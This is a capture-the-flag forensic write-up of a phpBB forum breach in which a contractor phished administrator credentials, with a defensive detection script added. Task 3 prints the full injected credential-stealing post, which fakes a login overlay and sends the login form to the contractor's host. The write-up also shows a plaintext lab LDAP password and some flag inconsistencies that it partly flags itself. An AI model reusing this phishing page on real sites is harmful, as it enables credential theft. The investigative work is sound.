Bumblebee

Challenge

  • Name: Sherlock - Bumblebee
  • Difficulty: Easy
  • Scenario: An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
  • Link: https://app.hackthebox.com/sherlocks/Bumblebee/play

Files

Download: bumblebee.zip (83 KB)

Tasks

Task 1

Description: What was the username of the external contractor? Masked Flag: ******1 Flag: apoole1

bumblebee.zip contains a single tarball, incident.tgz; extracting it gives us the phpBB SQLite database and the web server's access log. The database can be inspected with the sqlite3 utility, here by dumping it to SQL and grepping the INSERT statements.

$ zipinfo bumblebee.zip               
Archive:  bumblebee.zip
Zip file size: 85136 bytes, number of entries: 1
?rw-------  2.0 unx    86837 b- defN 23-Nov-23 02:25 incident.tgz
1 file, 86837 bytes uncompressed, 85014 bytes compressed:  2.1%

$ tar -xvf incident.tgz 
./phpbb.sqlite3
access.log

Registered accounts live in the phpbb_users table of the SQLite database; its schema is listed below.

CREATE TABLE `phpbb_users` (
  `user_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `user_type` integer NOT NULL DEFAULT 0
,  `group_id` integer  NOT NULL DEFAULT 3
,  `user_permissions` mediumtext NOT NULL
,  `user_perm_from` integer  NOT NULL DEFAULT 0
,  `user_ip` varchar(40) NOT NULL DEFAULT ''
,  `user_regdate` integer  NOT NULL DEFAULT 0
,  `username` varchar(255) NOT NULL DEFAULT ''
,  `username_clean` varchar(255) NOT NULL DEFAULT ''
,  `user_password` varchar(255) NOT NULL DEFAULT ''
,  `user_passchg` integer  NOT NULL DEFAULT 0
,  `user_email` varchar(100) NOT NULL DEFAULT ''
,  `user_email_hash` integer NOT NULL DEFAULT 0
,  `user_birthday` varchar(10) NOT NULL DEFAULT ''
,  `user_lastvisit` integer  NOT NULL DEFAULT 0
,  `user_lastmark` integer  NOT NULL DEFAULT 0
,  `user_lastpost_time` integer  NOT NULL DEFAULT 0
,  `user_lastpage` varchar(200) NOT NULL DEFAULT ''
,  `user_last_confirm_key` varchar(10) NOT NULL DEFAULT ''
,  `user_last_search` integer  NOT NULL DEFAULT 0
,  `user_warnings` integer NOT NULL DEFAULT 0
,  `user_last_warning` integer  NOT NULL DEFAULT 0
,  `user_login_attempts` integer NOT NULL DEFAULT 0
,  `user_inactive_reason` integer NOT NULL DEFAULT 0
,  `user_inactive_time` integer  NOT NULL DEFAULT 0
,  `user_posts` integer  NOT NULL DEFAULT 0
,  `user_lang` varchar(30) NOT NULL DEFAULT ''
,  `user_timezone` varchar(100) NOT NULL DEFAULT ''
,  `user_dateformat` varchar(64) NOT NULL DEFAULT 'd M Y H:i'
,  `user_style` integer  NOT NULL DEFAULT 0
,  `user_rank` integer  NOT NULL DEFAULT 0
,  `user_colour` varchar(6) NOT NULL DEFAULT ''
,  `user_new_privmsg` integer NOT NULL DEFAULT 0
,  `user_unread_privmsg` integer NOT NULL DEFAULT 0
,  `user_last_privmsg` integer  NOT NULL DEFAULT 0
,  `user_message_rules` integer  NOT NULL DEFAULT 0
,  `user_full_folder` integer NOT NULL DEFAULT -3
,  `user_emailtime` integer  NOT NULL DEFAULT 0
,  `user_topic_show_days` integer  NOT NULL DEFAULT 0
,  `user_topic_sortby_type` varchar(1) NOT NULL DEFAULT 't'
,  `user_topic_sortby_dir` varchar(1) NOT NULL DEFAULT 'd'
,  `user_post_show_days` integer  NOT NULL DEFAULT 0
,  `user_post_sortby_type` varchar(1) NOT NULL DEFAULT 't'
,  `user_post_sortby_dir` varchar(1) NOT NULL DEFAULT 'a'
,  `user_notify` integer  NOT NULL DEFAULT 0
,  `user_notify_pm` integer  NOT NULL DEFAULT 1
,  `user_notify_type` integer NOT NULL DEFAULT 0
,  `user_allow_pm` integer  NOT NULL DEFAULT 1
,  `user_allow_viewonline` integer  NOT NULL DEFAULT 1
,  `user_allow_viewemail` integer  NOT NULL DEFAULT 1
,  `user_allow_massemail` integer  NOT NULL DEFAULT 1
,  `user_options` integer  NOT NULL DEFAULT 230271
,  `user_avatar` varchar(255) NOT NULL DEFAULT ''
,  `user_avatar_type` varchar(255) NOT NULL DEFAULT ''
,  `user_avatar_width` integer  NOT NULL DEFAULT 0
,  `user_avatar_height` integer  NOT NULL DEFAULT 0
,  `user_sig` mediumtext NOT NULL
,  `user_sig_bbcode_uid` varchar(8) NOT NULL DEFAULT ''
,  `user_sig_bbcode_bitfield` varchar(255) NOT NULL DEFAULT ''
,  `user_jabber` varchar(255) NOT NULL DEFAULT ''
,  `user_actkey` varchar(32) NOT NULL DEFAULT ''
,  `user_newpasswd` varchar(255) NOT NULL DEFAULT ''
,  `user_form_salt` varchar(32) NOT NULL DEFAULT ''
,  `user_new` integer  NOT NULL DEFAULT 1
,  `user_reminded` integer NOT NULL DEFAULT 0
,  `user_reminded_time` integer  NOT NULL DEFAULT 0
,  UNIQUE (`username_clean`)
);

The most recently registered account (highest user_id) is the contractor's, and its contractor.net e-mail address confirms it; the answer to the task is apoole1. One check worth doing on your own copy: the row reproduced below is user_id 51 with username apoole, whereas the malicious post in Task 3 is attributed to poster_id 52, so confirm the username against the poster_id of that post rather than against the e-mail domain alone.

❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'INSERT INTO' | fgrep 'contractor'
..[snip]..
INSERT INTO phpbb_users VALUES(51,0,2,'',0,'10.10.0.78',1682420899,'apoole','apoole','$2y$10$Zdv/oKUxTjKLqQjL2oNWmuuFZUN9zNeJa0ka.R8RpQ4yqC4mAcQn.',1682423286,'apoole@contractor.net',312440918521,'',0,1682420899,0,'','',0,0,0,3,0,0,0,'en','Africa/Algiers','D M d, Y g:i a',1,0,'',0,0,0,0,-3,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,230271,'','',0,0,'','','','','','','xjogtb64yocxc2e4',0,0,0);
..[snip]..

Task 2

Description: What IP address did the contractor use to create their account? Masked Flag: X.X.X.X Flag: 10.10.0.78

From the row found in the previous task, the registration IP is 10.10.0.78: it is the sixth value in the INSERT, which maps to the user_ip column of the schema above.

INSERT INTO phpbb_users VALUES(51,0,2,'',0,'10.10.0.78',1682420899,'apoole','apoole','$2y$10$Zdv/oKUxTjKLqQjL2oNWmuuFZUN9zNeJa0ka.R8RpQ4yqC4mAcQn.',1682423286,'apoole@contractor.net',312440918521,'',0,1682420899,0,'','',0,0,0,3,0,0,0,'en','Africa/Algiers','D M d, Y g:i a',1,0,'',0,0,0,0,-3,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,230271,'','',0,0,'','','','','','','xjogtb64yocxc2e4',0,0,0);

The contractor's phpbb_users row also records two fields that point straight at the activity examined in Task 3:

  • user_lastpost_time: 1682425042, which is Tue Apr 25 12:17:22 UTC 2023 (08:17:22 EDT); this is also the post_time of the malicious post
  • user_lastpage: viewtopic.php?f=2&t=2, the topic that post belongs to

Task 3

Description: What is the post_id of the malicious post that the contractor made? Masked Flag: * Flag: 9

Posts are stored in the phpbb_posts table; its schema is listed below.

CREATE TABLE `phpbb_posts` (
  `post_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `topic_id` integer  NOT NULL DEFAULT 0
,  `forum_id` integer  NOT NULL DEFAULT 0
,  `poster_id` integer  NOT NULL DEFAULT 0
,  `icon_id` integer  NOT NULL DEFAULT 0
,  `poster_ip` varchar(40) NOT NULL DEFAULT ''
,  `post_time` integer  NOT NULL DEFAULT 0
,  `post_reported` integer  NOT NULL DEFAULT 0
,  `enable_bbcode` integer  NOT NULL DEFAULT 1
,  `enable_smilies` integer  NOT NULL DEFAULT 1
,  `enable_magic_url` integer  NOT NULL DEFAULT 1
,  `enable_sig` integer  NOT NULL DEFAULT 1
,  `post_username` varchar(255) NOT NULL DEFAULT ''
,  `post_subject` varchar(255) NOT NULL DEFAULT ''
,  `post_text` mediumtext NOT NULL
,  `post_checksum` varchar(32) NOT NULL DEFAULT ''
,  `post_attachment` integer  NOT NULL DEFAULT 0
,  `bbcode_bitfield` varchar(255) NOT NULL DEFAULT ''
,  `bbcode_uid` varchar(8) NOT NULL DEFAULT ''
,  `post_postcount` integer  NOT NULL DEFAULT 1
,  `post_edit_time` integer  NOT NULL DEFAULT 0
,  `post_edit_reason` varchar(255) NOT NULL DEFAULT ''
,  `post_edit_user` integer  NOT NULL DEFAULT 0
,  `post_edit_count` integer  NOT NULL DEFAULT 0
,  `post_edit_locked` integer  NOT NULL DEFAULT 0
,  `post_visibility` integer NOT NULL DEFAULT 0
,  `post_delete_time` integer  NOT NULL DEFAULT 0
,  `post_delete_reason` varchar(255) NOT NULL DEFAULT ''
,  `post_delete_user` integer  NOT NULL DEFAULT 0
);

Dumping phpbb_posts shows that post_id 9, posted from 10.10.0.78 and signed "Alex Poole", is a credential-stealing page rather than a forum message. Its post_text injects a stylesheet and script that overlay a full-screen, fixed-position "Session Timeout" modal replicating the board's own header, navigation and login form; the form's action points at the contractor's host and its target is a hidden iframe, so the victim's credentials are posted off-site without the page visibly leaving the forum. The script sets a phpbb_token cookie for 24 hours on submit and skips the overlay when that cookie exists, so each victim sees the fake login only once. Compare the legitimate post (post_id 2), stored in phpBB's usual <t>...</t> wrapper with the content escaped: phpBB's posting path would have escaped the <script> and <form> tags in post 9, so this raw HTML did not arrive through the normal editor.

❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'INSERT INTO phpbb_posts'
INSERT INTO phpbb_posts VALUES(2,1,2,50,0,'10.255.254.2',1681832510,0,1,1,1,1,'','Introduction Randy Savage',replace('<t>Good Afternoon everyone!<br/>\n<br/>\nI am new to the administration team here at forela, I''d like to take a minute and say hello!<br/>\nI have 5 years of administration experience and am ecstatic to be joining this team<br/>\n<br/>\nRegards,<br/>\nRandy</t>','\n',char(10)),'59bbd9d7e6f899713d7c1da1016e4d25',0,'','3nk',1,0,'',0,0,0,1,1681832532,'',48);
INSERT INTO phpbb_posts VALUES(9,2,2,52,0,'10.10.0.78',1682425042,0,1,1,1,1,'','Hello Everyone','<div><style>body {    z-index: 100;}.modal {    position:fixed;    top:0;    left:0;    height:100%;    width:100%;    z-index:101;    background-color:white;    opacity:1;}.modal.hidden {    visibility: hidden;}</style><script type="text/javascript">function sethidden(){    const d = new Date();    d.setTime(d.getTime() + (24*60*60*1000));    let expires = "expires="+ d.toUTCString();    document.cookie = "phpbb_token=1;" + expires + ";";    var modal = document.getElementById(''zbzbz1234'');    modal.classList.add("hidden");}document.addEventListener("DOMContentLoaded", function(event) {    let cookieexists = false;    let name = "phpbb_token=";    let cookies = decodeURIComponent(document.cookie);    let ca = cookies.split('';'');    for(let i = 0; i < ca.length; i++)    {        let c = ca[i];        while(c.charAt(0) == '' '')        {            c = c.substring(1);        }        if(c.indexOf(name) == 0) {            cookieexists = true;        }    }    if(cookieexists){        return;    }    var modal = document.getElementById(''zbzbz1234'');    modal.classList.remove("hidden");});</script><iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>    <div class="modal hidden" id="zbzbz1234" onload="shouldshow">    <div id="wrap" class="wrap">        <a id="top" class="top-anchor" accesskey="t"></a>        <div id="page-header">            <div class="headerbar" role="banner">                <div class="inner">                    <div id="site-description" class="site-description">                    <a id="logo" class="logo" href="./index.php" title="Board index"><span class="site_logo"></span></a>                    <h1>forum.forela.co.uk</h1>                    <p>Forela internal forum</p>                    <p class="skiplink"><a href="#start_here">Skip to content</a></p>                </div>                    <div id="search-box" 
class="search-box search-header" role="search">                    <form action="./search.php" method="get" id="search1">                    <fieldset>                        <input name="keywords" id="keywords1" type="search" maxlength="128" title="Search for keywords" class="inputbox search tiny" size="20" value="" placeholder="Search…">                        <button class="button button-search" type="submit" title="Search">                            <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                        </button>                        <a href="./search.php" class="button button-search-end" title="Advanced search">                            <i class="icon fa-cog fa-fw" aria-hidden="true"></i><span class="sr-only">Advanced search</span>                        </a>                    </fieldset>                    </form>                </div>                    </div>            </div>    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-main" class="nav-main linklist" role="menubar">                <li id="quick-links" class="quick-links dropdown-container responsive-menu" data-skip-responsive="true">                <a href="#" class="dropdown-trigger dropdown-toggle">                    <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick links</span>                </a>                <div class="dropdown">                    <div class="pointer"><div class="pointer-inner"></div></div>                    <ul class="dropdown-contents" role="menu">                                <li class="separator"></li>                                <li>                                    <a href="./search.php?search_id=unanswered" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-gray" aria-hidden="true"></i><span>Unanswered topics</span>                                    </a>                                </li>         
                       <li>                                    <a href="./search.php?search_id=active_topics" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-blue" aria-hidden="true"></i><span>Active topics</span>                                    </a>                                </li>                                <li class="separator"></li>                                <li>                                    <a href="./search.php" role="menuitem">                                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span>Search</span>                                    </a>                                </li>                            <li class="separator"></li>                        </ul>                </div>            </li>                <li data-skip-responsive="true">                <a href="/phpBB3/app.php/help/faq" rel="help" title="Frequently Asked Questions" role="menuitem">                    <i class="icon fa-question-circle fa-fw" aria-hidden="true"></i><span>FAQ</span>                </a>                            <li class="rightside" data-skip-responsive="true">                <a href="./ucp.php?mode=login" title="Login" accesskey="x" role="menuitem">                    <i class="icon fa-power-off fa-fw" aria-hidden="true"></i><span>Login</span>                </a>            </li>                <li class="rightside" data-skip-responsive="true">                    <a href="./ucp.php?mode=register" role="menuitem">                        <i class="icon fa-pencil-square-o  fa-fw" aria-hidden="true"></i><span>Register</span>                    </a>                </li>        </li data-skip-responsive="true"></ul>            <ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks" role="menubar">            <li class="breadcrumbs" itemscope="" itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">                    <span class="crumb" 
itemtype="http://schema.org/ListItem" itemprop="itemListElement" itemscope=""><a href="./index.php" itemtype="https://schema.org/Thing" itemprop="item" accesskey="h" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw"></i><span itemprop="name">Board index</span></a><meta itemprop="position" content="1"></span>                </li>                    <li class="rightside responsive-search">                    <a href="./search.php" title="View the advanced search options" role="menuitem">                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                    </a>                </li>        </ul>            </div>    </div>        </div>                <a id="start_here" class="anchor"></a>        <div id="page-body" class="page-body" role="main">                <div class="panel">                <div class="inner">                        <div class="content">                    <h3>Session Timeout</h3>		    <br/>		    <br/>                    <p>Your session token has timed out in order to proceed you must login again.</p>                </div>                        </div>            </div>    <form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe">    <div class="panel">        <div class="inner">            <div class="content">            <h2 class="login-title">Login</h2>                <fieldset class="fields1">            <dl>                <dt><label for="username">Username:</label></dt>                <dd><input type="text" tabindex="1" name="username" id="username" size="25" value="" class="inputbox autowidth"></dd>            </dl>            <dl>                <dt><label for="password">Password:</label></dt>                <dd><input type="password" tabindex="2" id="password" name="password" size="25" class="inputbox autowidth" autocomplete="off"></dd>            </dl>            <dl>    <dd><label 
for="autologin"><input type="checkbox" name="autologin" id="autologin" tabindex="4">Remember me</label></dd>			<dd><label for="viewonline"><input type="checkbox" name="viewonline" id="viewonline" tabindex="5">Hide my online status this session</label></dd>            </dl>                <dl>                <dt>&nbsp;</dt>                <dd>    <input type="submit" name="login" tabindex="6" value="Login" class="button1" onclick="sethidden()"></dd>            </dl>                    </fieldset class="fields1"></div>            </div>    </div>        </form>            </div>            <div id="page-footer" class="page-footer" role="contentinfo">    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-footer" class="nav-footer linklist" role="menubar">            <li class="breadcrumbs">    <span class="crumb"><a href="./index.php" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw" aria-hidden="true"></i><span>Board index</span></a></span>		</li>                <li class="responsive-menu hidden rightside dropdown-container"><a href="javascript:void(0);" class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i class="icon fa-bars fa-fw" aria-hidden="true"></i></a><div class="dropdown"><div class="pointer"><div class="pointer-inner"></div></div><ul class="dropdown-contents"></ul></div></li><li class="rightside">All times are <span title="UTC">UTC</span></li>                <li class="rightside">                    <a href="./ucp.php?mode=delete_cookies" data-ajax="true" data-refresh="true" role="menuitem">                        <i class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete cookies</span>                    </a>                </li>        </ul>            </div>    </div>            <div class="copyright">            <p class="footer-row">                <span class="footer-copyright">Powered by <a href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB 
Limited</span>            </p>            <p class="footer-row">                <a class="footer-link" href="./ucp.php?mode=privacy" title="Privacy" role="menuitem">                    <span class="footer-link-text">Privacy</span>                </a>                |                <a class="footer-link" href="./ucp.php?mode=terms" title="Terms" role="menuitem">                    <span class="footer-link-text">Terms</span>                </a>            </p>        </div>            <div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error" data-ajax-error-text="Something went wrong when processing your request." data-ajax-error-text-abort="User aborted request." data-ajax-error-text-timeout="Your request timed out; please try again." data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">            <div id="darken" class="darken">&nbsp;</div>        </div>            <div id="phpbb_alert" class="phpbb_alert" data-l-err="Error" data-l-timeout-processing-req="Request timed out.">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <h3 class="alert_title">&nbsp;</h3><p class="alert_text"></p>        </div>        <div id="phpbb_confirm" class="phpbb_alert">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <div class="alert_text"></div>        </div>    </div>        </div>        <div>        <a id="bottom" class="anchor" accesskey="z"></a>    <img src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron"></div></div><span>Greetings everyone,<br>	<br>	I am just a visiting IT Contractor, it''s a fantastic company y''all have here.<br>	I hope to work with you all again soon.<br>	<br>	Regards,<br>Alex 
Poole</span></div>','d2788f4645ab450a05b1832b98d98d0f',0,'','af1z987',1,0,'',0,0,0,1,0,'',0);

Task 4

Description: What is the full URI that the credential stealer sends its data to? Masked Flag: *****//**.**.*.**/******.**p Flag: http://10.10.0.78/update.php

In the contractor's post from the previous task, the fake login form's action attribute gives the URL the credential stealer submits to. Because the form targets the hidden iframe, the victim's browser posts the username and password fields to the attacker's host while the forum page stays in place:

<form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe">
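Grepping a .dump works for a small board, but the same questions (Tasks 1 to 4) are easier to answer, and to repeat on the next incident, by querying the SQLite file directly and flagging any post whose text carries raw active markup or a form that submits off-host. The script below is an added example and not part of the original write-up. It runs against a constructed in-memory fixture holding only the columns it reads, with values taken from the dump excerpts above (the user_id 48 administrator row is a placeholder, since the write-up does not show that row, and both post texts are shortened); the board's own address 10.10.0.27 is taken from the Referer values in access.log. Point load_fixture() at the real phpbb.sqlite3 to use it on the evidence.

```python
import re
import sqlite3
from datetime import datetime, timezone
from urllib.parse import urlparse

# Address the board itself is served from, taken from the Referer values in access.log.
FORUM_HOST = "10.10.0.27"

# Constructed in-memory fixture: only the columns this script reads, with values from the dump
# above. The user_id 48 row is a placeholder for the administrator (the dump excerpt does not show
# that row) and the benign post text is shortened.
FIXTURE_SQL = """
CREATE TABLE phpbb_users (user_id INTEGER PRIMARY KEY, user_ip TEXT, user_regdate INTEGER,
                          username TEXT, user_email TEXT);
CREATE TABLE phpbb_posts (post_id INTEGER PRIMARY KEY, topic_id INTEGER, poster_id INTEGER,
                          poster_ip TEXT, post_time INTEGER, post_subject TEXT, post_text TEXT);
INSERT INTO phpbb_users VALUES (48, '10.255.254.2', 1681832000, 'forum_admin', 'admin@forela.co.uk');
INSERT INTO phpbb_users VALUES (51, '10.10.0.78', 1682420899, 'apoole', 'apoole@contractor.net');
INSERT INTO phpbb_posts VALUES (2, 1, 50, '10.255.254.2', 1681832510, 'Introduction Randy Savage',
  '<t>Good Afternoon everyone!<br/>I am new to the administration team here at forela</t>');
"""

# Cut-down copy of post_id 9: overlay CSS/JS, the hidden iframe, the board's own (harmless,
# relative) search form, and the fake login form that posts to the attacker's host.
PHISH_POST = (
    '<div><style>.modal{position:fixed;top:0;left:0;height:100%;width:100%;z-index:101}</style>'
    '<script type="text/javascript">document.cookie = "phpbb_token=1;";</script>'
    '<iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>'
    '<form action="./search.php" method="get" id="search1"><input name="keywords"></form>'
    '<h3>Session Timeout</h3>'
    '<form action="http://10.10.0.78/update.php" method="post" id="login" target="hiddenframe">'
    '<input type="text" name="username"><input type="password" name="password">'
    '<input type="submit" name="login" value="Login" onclick="sethidden()"></form></div>'
)


def load_fixture() -> sqlite3.Connection:
    """Build the constructed database; swap for sqlite3.connect("phpbb.sqlite3") on real evidence."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(FIXTURE_SQL)
    conn.execute("INSERT INTO phpbb_posts VALUES (?, ?, ?, ?, ?, ?, ?)",
                 (9, 2, 52, "10.10.0.78", 1682425042, "Hello Everyone", PHISH_POST))
    conn.commit()
    return conn


def to_utc(epoch: int) -> str:
    """phpBB stores Unix epochs; render them in the Sherlock's DD/MM/YYYY HH:mm:ss UTC format."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%d/%m/%Y %H:%M:%S")


def newest_users(conn: sqlite3.Connection, limit: int = 3) -> list[dict]:
    """Tasks 1 and 2: most recent registrations with the IP each account was created from."""
    rows = conn.execute(
        "SELECT user_id, username, user_email, user_ip, user_regdate "
        "FROM phpbb_users ORDER BY user_regdate DESC LIMIT ?", (limit,)).fetchall()
    return [{"user_id": uid, "username": name, "email": mail, "ip": ip, "registered_utc": to_utc(reg)}
            for uid, name, mail, ip, reg in rows]


ACTIVE_MARKUP = ("<script", "<iframe", "<form", "<style")
FORM_ACTION = re.compile(r'<form\b[^>]*\baction=["\']([^"\']+)', re.IGNORECASE)


def suspicious_posts(conn: sqlite3.Connection, forum_host: str) -> list[dict]:
    """Tasks 3 and 4: posts carrying raw active markup, plus any form action that leaves the board.

    phpBB's posting path HTML-escapes user input and wraps it in <t>/<r>, so a post_text holding
    literal <script>/<form> tags did not come through the normal editor.
    """
    findings = []
    for post_id, poster_id, poster_ip, post_time, subject, text in conn.execute(
            "SELECT post_id, poster_id, poster_ip, post_time, post_subject, post_text FROM phpbb_posts"):
        lowered = text.lower()
        markers = [tag for tag in ACTIVE_MARKUP if tag in lowered]
        if not markers:
            continue
        # Relative actions (./search.php) have no hostname and absolute ones pointing at the board
        # itself are expected; anything else is a candidate exfiltration endpoint.
        exfil = [action for action in FORM_ACTION.findall(text)
                 if urlparse(action).hostname not in (None, forum_host)]
        findings.append({"post_id": post_id, "poster_id": poster_id, "poster_ip": poster_ip,
                         "posted_utc": to_utc(post_time), "subject": subject,
                         "markers": markers, "exfil_urls": exfil})
    return findings


if __name__ == "__main__":
    db = load_fixture()
    for user in newest_users(db):
        print(user)
    for finding in suspicious_posts(db, FORUM_HOST):
        print(finding)
```

The hostname filter is what separates the board's own search form from the stealer: both are <form> tags, but only one submits to a host other than the forum. On a real dump, also compare poster_id against user_id in phpbb_users, since the two tables are joined on that column.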

Task 5

Description: When did the contractor log into the forum as the administrator? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 10:53:12

We first look in access.log for POST login requests from the contractor's IP that returned a 302 (phpBB redirects after a successful login):

cat access.log | fgrep '10.10.0.78' | fgrep 'login' | fgrep 'POST' | fgrep '302' | sort -u
10.10.0.78 - - [25/Apr/2023:13:15:48 +0100] "POST /ucp.php?mode=login&sid=c587ec8329ee2e1d9d210882f46d09eb HTTP/1.1" 302 632 "http://10.10.0.27/ucp.php?mode=login&sid=c587ec8329ee2e1d9d210882f46d09eb" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
10.10.0.78 - - [26/Apr/2023:11:53:01 +0100] "POST /ucp.php?mode=login&sid=894e8c0e8171f709103b4a4b5b932d95 HTTP/1.1" 302 633 "http://10.10.0.27/ucp.php?mode=login&sid=894e8c0e8171f709103b4a4b5b932d95" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

Neither of these is the accepted answer. The 26 April POST to ucp.php at 11:53:01 +0100 (10:53:01 UTC) is the forum login; what the task wants is the moment the contractor authenticated into the Administration Control Panel, which phpBB records separately in its own audit table, so we look there next.

phpBB keeps its own audit log in the phpbb_log table; its schema is listed below.

CREATE TABLE `phpbb_log` (
  `log_id` integer  NOT NULL PRIMARY KEY AUTOINCREMENT
,  `log_type` integer NOT NULL DEFAULT 0
,  `user_id` integer  NOT NULL DEFAULT 0
,  `forum_id` integer  NOT NULL DEFAULT 0
,  `topic_id` integer  NOT NULL DEFAULT 0
,  `post_id` integer  NOT NULL DEFAULT 0
,  `reportee_id` integer  NOT NULL DEFAULT 0
,  `log_ip` varchar(40) NOT NULL DEFAULT ''
,  `log_time` integer  NOT NULL DEFAULT 0
,  `log_operation` text NOT NULL
,  `log_data` mediumtext NOT NULL
);

In phpbb_log, log_id 61 records a LOG_ADMIN_AUTH_SUCCESS (a successful login to the Administration Control Panel) at epoch 1682506392, eleven seconds after the forum login seen in access.log. The user_id is 48, the administrator whose credentials were phished, while log_ip is the contractor's 10.10.0.78. The two entries that follow show what the hijacked session was used for.

..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506392 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

python3 -c 'from datetime import datetime, timezone; print(datetime.fromtimestamp(1682506392, tz=timezone.utc).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:53:12

Task 6

Description: In the forum there are plaintext credentials for the LDAP connection, what is the password? Masked Flag: ********1 Flag: Passw0rd1

The LDAP bind credentials live in the phpbb_config table: auth_method is db_or_ldap, the bind account is CN=phpbb-admin,OU=Service,OU=Forela,DC=forela,DC=local on 10.10.0.11, and ldap_password holds Passw0rd1 in plaintext. phpBB has to keep this value in usable form to bind to the directory, which is why the database backup the contractor downloaded (Task 9) hands them a domain service account as well: that password needs rotating as part of the response.

❯ sqlite3 ./phpbb.sqlite3 .dump | fgrep 'ldap'
INSERT INTO phpbb_config VALUES('auth_method','db_or_ldap',0);
INSERT INTO phpbb_config VALUES('ldap_base_dn','OU=Forela,DC=forela,DC=local',0);
INSERT INTO phpbb_config VALUES('ldap_email','',0);
INSERT INTO phpbb_config VALUES('ldap_password','Passw0rd1',0);
INSERT INTO phpbb_config VALUES('ldap_port','',0);
INSERT INTO phpbb_config VALUES('ldap_server','10.10.0.11',0);
INSERT INTO phpbb_config VALUES('ldap_uid','sAMAccountName',0);
INSERT INTO phpbb_config VALUES('ldap_user','CN=phpbb-admin,OU=Service,OU=Forela,DC=forela,DC=local',0);
INSERT INTO phpbb_config VALUES('ldap_user_filter','',0);

Task 7

Description: What is the user agent of the Administrator user? Masked Flag: *******/*.* (*********; ***** *** ** * **_**_*) ***********/***.** (*****, **** *****) ******/***.*.*.* ******/***.*6 Flag: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

In access.log, the contractor's final request carries the Administration Control Panel (/adm/index.php) as its referer, which gives us the path to look for when picking out administrator activity:

cat access.log | fgrep '10.10.0.78' | tail -n1
10.10.0.78 - - [26/Apr/2023:12:01:53 +0100] "GET /index.php?sid=be3cc6e2de08bafa4044f552813e2cbe HTTP/1.1" 200 3796 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

Requests referring to /adm/index.php from any IP other than the contractor's come from 10.255.254.2, the same address that posted the administrator's introduction (post_id 2 above). Its user agent is therefore the administrator's: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36.

cat access.log | fgrep -v '10.10.0.78' | fgrep '/adm/index.php' | tail -n1
10.255.254.2 - - [25/Apr/2023:13:17:32 +0100] "GET /index.php?sid=041ca559047513ba2267dfc066187582 HTTP/1.1" 200 4348 "http://10.10.0.27/adm/index.php?i=acp_board&sid=041ca559047513ba2267dfc066187582&mode=auth" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"

Task 8

Description: What time did the contractor add themselves to the Administrator group? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 10:53:51

In phpbb_log, log_id 62 records a LOG_USERS_ADDED at epoch 1682506431; the serialised log_data names the group (Administrators) and the account added (apoole), and the action was performed as user_id 48 from the contractor's IP.

..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
